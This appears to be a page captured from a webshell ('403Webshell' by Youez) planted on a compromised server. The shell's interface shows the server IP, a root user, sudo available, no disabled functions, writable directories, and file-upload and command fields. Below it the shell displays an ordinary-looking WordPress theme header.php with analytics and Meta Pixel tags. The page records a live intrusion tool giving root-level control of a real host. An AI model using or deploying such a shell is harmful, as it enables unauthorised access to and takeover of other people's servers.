403Webshell
Server IP : 14.225.204.176  /  Your IP : 216.73.216.6
Web Server : nginx/1.24.0
System : Linux nodejs-ybgk 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64
User : root ( 0)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/php/venus-cms/wp-content/themes/venus/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/php/venus-cms/wp-content/themes/venus//header.php
<!DOCTYPE html>
<html class="no-js" <?php language_attributes(); ?> >
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="initial-scale=1.0001, minimum-scale=1.0001, maximum-scale=1.0001, user-scalable=no">
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800;900&family=Libre+Baskerville:ital,wght@0,400;0,700;1,400&display=swap" rel="stylesheet">
    <?php wp_head(); ?>
    <link rel="alternate" type="application/rss+xml" title="<?php echo get_bloginfo('name'); ?>" href="<?php echo esc_url(get_feed_link()); ?>">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
    <link rel="icon" href="/favicon.ico" type="image/x-icon">
    <!-- get ajax_url -->
    <script type="text/javascript">
      var ajax_url = "<?php echo admin_url('admin-ajax.php'); ?>";
    </script>
    <?php
      get_template_part("templates/tracking-code");
    ?>
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-638K0YXW03"></script>
    <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'G-L265SS5KRM');
    </script>
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '265568402659996');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=265568402659996&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
</head>
<?php 
   $primary_navigation  = 'primary_navigation'; 
?>
<body <?php body_class( ); ?> >
    <div class="wrapper">
        <!-- header -->
        <header class="header-site">
            <nav class="navbar navbar-expand-lg">
                <div class="container">
                    <a class="navbar-brand" href="/">
                        <img style="width: 200px;" src="<?php echo get_theme_file_uri() ?>/assets/images/logo.svg" alt=""/>
                    </a>
                    
                    <div class="collapse navbar-collapse flex-lg-fill" id="navbarSupportedContent">
                        <ul class="navbar-nav mb-2 mb-lg-0 w-100 justify-content-lg-between">
                            <?php
                              $locations = get_nav_menu_locations();
                              if ( isset( $locations[ $primary_navigation ] ) ) {
                                $primary_navigation = wp_get_nav_menu_object( $locations[ $primary_navigation ] ); 
                                if(!empty($primary_navigation)) {
                                    $menu_items  = wp_get_nav_menu_items($primary_navigation->term_id); 
                                    if(!empty($menu_items )) {
                                        $menu_list ='';
                                        $count = 0;
                                        $submenu = false;
                                        
                                        foreach( $menu_items as $menu_item ) {
                                            
                                            $link = $menu_item->url;
                                            $title = $menu_item->title;
                                            
                                            if ( !$menu_item->menu_item_parent ) {
                                                $parent_id = $menu_item->ID;
                                                
                                                $menu_list .= '<li class="nav-item dropdown">' ."\n";
                                                $menu_list .= '<a href="'.$link.'" class="nav-link">'.$title.'</a>' ."\n";
                                            }
                                
                                            if ( $parent_id == $menu_item->menu_item_parent ) {
                                
                                                if ( !$submenu ) {
                                                    $submenu = true;
                                                    $menu_list .= '<button class="btn-clear btn-toggle-submenu d-lg-none" role="button" data-bs-toggle="dropdown" aria-expanded="false">' ."\n";
                                                    $menu_list .= '<i class="fa-solid fa-angle-down"></i>' ."\n";
                                                    $menu_list .= '</button>' ."\n";
                                                    $menu_list .= '<ul class="dropdown-menu">' ."\n";
                                                }
                                
                                                $menu_list .= '<li class="">' ."\n";
                                                $menu_list .= '<a href="'.$link.'" class="dropdown-item">'.$title.'</a>' ."\n";
                                                $menu_list .= '</li>' ."\n";
                                                    
                                
                                                if ( $menu_items[ $count + 1 ]->menu_item_parent != $parent_id && $submenu ){
                                                    $menu_list .= '</ul>' ."\n";
                                                    $submenu = false;
                                                }
                                
                                            }
                                
                                            if ( $menu_items[ $count + 1 ]->menu_item_parent != $parent_id ) { 
                                                $menu_list .= '</li>' ."\n";      
                                                $submenu = false;
                                            }
                                
                                            $count++;
                                        } 
                                        echo $menu_list;
                                    }
                                    
                                    } 
                            }
                            ?> 
                        </ul>
                    </div>
                    <div class="navbar-right">
                        <div class="box-search d-none d-md-block"> 
                            <?php
                            get_template_part("templates/searchform");
                            ?>
                        </div>
                        <button class="navbar-toggler ms-lg-0" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                            <span></span>
                        </button>
                    </div> 
                </div>
            </nav>
        </header>
        <!-- e: header -->

Youez - 2016 - github.com/yon3zu
LinuXploit